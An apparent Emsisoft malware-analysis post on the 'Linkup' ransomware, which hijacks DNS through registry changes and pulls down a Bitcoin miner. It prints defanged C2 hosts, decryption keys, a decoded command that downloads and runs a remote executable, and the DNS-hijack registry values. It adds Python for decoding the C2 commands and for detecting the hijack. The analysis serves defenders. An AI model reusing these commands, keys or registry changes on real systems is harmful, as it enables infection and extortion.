Malware Analysis: Ransomware “Linkup” Blocks DNS and Mines Bitcoins
Over the past week, the Emsisoft Malware Analysis team has been closely following a new ransomware Trojan variant that has been detected by Emsisoft Anti-Malware as Trojan-Ransom.Win32.Linkup.
“Linkup” is an interesting piece of ransomware, because unlike previous models it does not directly lock your computer or encrypt files. Instead, Linkup blocks Internet access by modifying your DNS and can also turn your computer into a bitcoin mining robot.
Protecting Yourself from Linkup
Users running Emsisoft Anti-Malware are automatically protected from Linkup, and should block the program when it is identified as Trojan-Ransom.Win32.Linkup. Users who have been infected by Linkup will be blocked from Internet usage and will encounter the following “website” when attempting to browse.
What is encountered is the typical ransomware form, which in this case demands personal information and a payment method to unlock Internet usage. The form states that you will only be charged EUR 0.01, but this is unconfirmed and most likely a blatant lie. Do not submit any personal information! If your computer has been infected, we advise you to find another means of connecting to the Internet and to contact Emsisoft Support to assist you with removal.
How Linkup Works
Once the Linkup Trojan has been executed, it makes a copy of itself in the %AppData%\Microsoft\Windows directory named svchost.exe, a fake name meant to mimic the legitimate Windows file of the same name, which is located in %windir%\system32. To mark its presence in the system, Linkup creates a mutex named tnd990r or tnd990s. We have also found that Linkup will actually disable selected Windows Security and Firewall services to facilitate infection.
Once established on your PC, Linkup contacts its server to provide it with data related to your machine. It does this by sending a POST request, with its payload encrypted, to the following address.
What kind of data is Linkup sending its server? When decrypted the “token” value will look like this:
uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1
That’s your unique user id (uid), your version of Windows (ver), and the language you’re using — in this case ENU, or United States English. This information helps facilitate infection, as Linkup must know what type of computer it is working with if it is to function.
Linkup also gives itself a layer of redundancy, so that if one host fails it can still communicate with another Command and Control server. Decryption reveals the following Command and Control hosts:
hxxp://62.75.221.37/uplink.php?logo.jpg
hxxp://hoseen45r.com/uplink.php?logo.jpg
hxxp://onetimes21s.com/uplink.php?logo.jpg
hxxp://setpec14rs.com/uplink.php?logo.jpg
Linkup decrypts the string with the following key:
IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t
Further analysis of Linkup’s body reveals another interesting string, which is actually another decryption key:
Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI
This key translates commands from Linkup’s server so that the malware can perform them. Upon initial connection, the very first command that is sent looks likes this:
nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV
Linkup decrypts this command using its key, turning it into this:
IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe
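The article does not spell out how the command string is encoded, but the key has exactly 64 distinct characters, and working from the sample above, the command decodes as base64 with the key standing in for the standard alphabet and each 4-character group reversed before decoding. The Python decoder below is an added example written for this article, not Emsisoft's own tooling; the transform it applies is inferred from the page's own key and ciphertext rather than documented anywhere, and because the decoded text carries the live (not defanged) URL, a small helper re-defangs it for display the way the article does.

```python
import base64
import string

# Command-decryption key and first C2 command, both as given in the write-up.
LINKUP_COMMAND_KEY = "Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI"
FIRST_COMMAND = "nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV"

# Standard base64 alphabet, in order: A-Z, a-z, 0-9, +, /
STANDARD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def decode_linkup(blob: str, key: str) -> bytes:
    """Decode a Linkup string: un-reverse each 4-character group, then
    base64-decode with `key` as the alphabet. The transform is inferred from
    the sample in the article, not taken from any documentation."""
    if len(key) != 64 or len(set(key)) != 64:
        raise ValueError("key must be 64 distinct characters")
    if len(blob) % 4 != 0:
        raise ValueError("ciphertext length must be a multiple of 4")
    unreversed = "".join(blob[i:i + 4][::-1] for i in range(0, len(blob), 4))
    to_standard = str.maketrans(key, STANDARD_ALPHABET)
    # The sample pads the final group with the key's first character (value 0)
    # instead of '=', so the decoded tail carries NUL bytes rather than padding.
    return base64.b64decode(unreversed.translate(to_standard), validate=True)


def decode_command(blob: str, key: str = LINKUP_COMMAND_KEY) -> str:
    """Return the command text with the trailing NUL padding removed."""
    return decode_linkup(blob, key).rstrip(b"\x00").decode("latin-1")


def parse_commands(text: str) -> list:
    """Split decoded command text into (verb, argument) pairs, one per line."""
    commands = []
    for line in text.splitlines():
        if line.strip():
            verb, _, argument = line.partition(" ")
            commands.append((verb, argument))
    return commands


def defang(text: str) -> str:
    """Render URLs harmlessly for reports, as the article does with hxxp."""
    return text.replace("http://", "hxxp://")


if __name__ == "__main__":
    decoded = decode_command(FIRST_COMMAND)
    print(defang(decoded))
    for verb, argument in parse_commands(decoded):
        print(f"verb={verb!r} argument={defang(argument)!r}")
```

Running it against the command string above yields the two lines the article shows (IL with the C2 address and RUN with the downloader URL), followed by two NUL bytes that the decoder strips. The same routine should work for the other encrypted strings in the sample (the check-in token and the C2 host list) with the first key from the article, but the page does not show their ciphertext, so that is not verified here.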
The first command (IL 62.75.221.37) redirects every HTTP request to the ransomware website, located at 62.75.221.37 and addressed hxxp://62.75.221.37/worlds/test/index.html. At this point, Linkup will then begin to redirect your DNS so that you end up at the ransomware site whenever you browse.
To redirect every single DNS request, Linkup also makes several changes in the Windows registry, including modifying the following:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%
"NameServer" = "127.0.0.1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%
"DhcpNameServer" = "127.0.0.1"
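A defender-side check for this registry change, written as an added example for this article rather than anything from Emsisoft: the pure function takes a dictionary of per-interface values (so it can be run against an exported hive or the constructed sample below), and the winreg reader, which only works on Windows, fills that dictionary from the Interfaces key the article names. The interface GUIDs in the sample are made up.

```python
import ipaddress

# Registry key Linkup modifies (from the article); one subkey per interface GUID.
INTERFACES_KEY = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"
DNS_VALUE_NAMES = ("NameServer", "DhcpNameServer")

# Constructed sample: one interface hijacked the way the article describes,
# one with a normal LAN resolver. GUIDs are placeholders, not real interfaces.
SAMPLE_INTERFACES = {
    "{11111111-2222-3333-4444-555555555555}": {
        "NameServer": "127.0.0.1",
        "DhcpNameServer": "127.0.0.1",
    },
    "{66666666-7777-8888-9999-000000000000}": {
        "NameServer": "",
        "DhcpNameServer": "192.168.1.1",
    },
}


def suspicious_servers(value: str) -> list:
    """Return the entries of a NameServer-style value that point at loopback.
    Windows stores these as comma- or space-separated lists."""
    hits = []
    for item in value.replace(",", " ").split():
        try:
            address = ipaddress.ip_address(item)
        except ValueError:
            continue  # not an IP literal; ignore
        if address.is_loopback:
            hits.append(item)
    return hits


def find_dns_hijack(interfaces: dict) -> list:
    """interfaces: {guid: {value_name: value_data}}.
    Returns (guid, value_name, [loopback entries]) for every suspicious value."""
    findings = []
    for guid, values in interfaces.items():
        for name in DNS_VALUE_NAMES:
            data = values.get(name)
            if not data:
                continue
            hits = suspicious_servers(data)
            if hits:
                findings.append((guid, name, hits))
    return findings


def read_interfaces_from_registry() -> dict:
    """Windows only: collect both DNS values for every interface subkey."""
    import winreg  # imported here so the pure logic above runs anywhere
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, INTERFACES_KEY) as root:
        index = 0
        while True:
            try:
                guid = winreg.EnumKey(root, index)
            except OSError:
                break  # no more subkeys
            index += 1
            values = {}
            with winreg.OpenKey(root, guid) as sub:
                for name in DNS_VALUE_NAMES:
                    try:
                        values[name] = winreg.QueryValueEx(sub, name)[0]
                    except FileNotFoundError:
                        pass
            result[guid] = values
    return result


if __name__ == "__main__":
    import sys
    data = read_interfaces_from_registry() if sys.platform == "win32" else SAMPLE_INTERFACES
    for guid, name, hits in find_dns_hijack(data):
        print(f"{guid}: {name} points at loopback {hits}")
```

A loopback resolver is a lead, not proof: machines that run their own caching resolver or certain VPN and filtering products set 127.0.0.1 legitimately. Pair the finding with the other indicators the article gives (the tnd990r/tnd990s mutex and the svchost.exe copy under %AppData%\Microsoft\Windows) before treating a host as infected.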
Linkup then finalizes this action by refreshing various Internet/connectivity component settings, in order to ensure the changes it made are effective immediately. It does this by running the following commands:
This redirect is malicious enough, but what is so interesting about Linkup is that it doesn’t stop there. Note the second line of the initial command from the server: RUN hxxp://91.220.163.22/pts2.exe. This command instructs your computer to download and run the file pts2.exe.
What’s pts2.exe? A downloader designed to connect your computer to a Bitcoin mining botnet!
Bitcoin Mining Botnet?
The technical processes behind “Bitcoin mining” are complex. For a good summary, consider reading Ken Tiddel’s “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995,” or Emsisoft’s Attack on Bitcoins.
In the case of Linkup, the most important thing to understand about Bitcoin mining is that if a hacker can get more computing power, he can earn more Bitcoins. That’s why in addition to blocking Internet browsing, Linkup also attempts to connect your computer to a Bitcoin mining botnet, which can combine the computing power of multiple infected computers to earn new Bitcoins for whoever is behind the attack.
Pts2.exe is a downloader, and it’s placed in the same directory as the fake svchost.exe file we started this analysis out with. Behind the scenes, pts2.exe is actually formatted as Update_%random%.exe. This is a .NET based file designed to download and execute another file from hxxp://64.32.28.155/b.exe and store it in C:\Users\Public\b.exe.
Upon further analysis, our malware team identified this “other file” to be a self-extracting RAR that extracts several script files and one executable. The SFX script executes a 64-bit PE file, named j.exe, which is jhProtominer. As the name suggests, jhProtominer is a Bitcoin mining application.
This combination of ransomware and Bitcoin mining is a new and fascinating development. At this point, however, its functionality is still quite limited as the downloaded jhProtominer only works on 64-bit operating systems. In time, it will be interesting to see if Linkup is modified to download more flexible variants.
Hashes of files analyzed in this article
- Trojan-Ransom.Win32.Linkup
MD5: f1304992523cd68f7412a355d2fb9d5d
SHA1: ce70e50707b456e0e2f086126bdcfa266d5a57ae
- pts2.exe (Bitcoin miner downloader)
MD5: 7eb809d8ea5bfe602648752289669632
SHA1: 20bd75b9c47ac075d51783a5f3c5309091c7c6a7
- b.exe (Bitcoin miner package – Self-extracting Archive)
MD5: 29eea4cd040bff1028d5b6092f22f9bf
SHA1: 1b3389328f9ebf706f09445ca0adc5efd2e98f79
- j.exe (jhProtominer)
MD5: 2e9a71e4ee33d190056e081e6726fa56
SHA1: db355fc276b8174e1753f45dbdf52536f7740316
What do you think about Linkup?
In the coming weeks, Emsisoft’s Malware Analysis team will be keeping a close eye on Linkup, as the malware will inevitably evolve. We have provided this analysis because Linkup represents a new approach to infection, which combines two known techniques — ransomware and Bitcoin mining — to create one potent form of money-making malware.
If you have any questions about Linkup, we encourage you to contact Emsisoft Support directly. There, you can share your thoughts or even your own discoveries to help Emsisoft in its mission of making the world a more malware-free place. In the meantime, steer clear of the mines, and have a great (ransomware-free) day!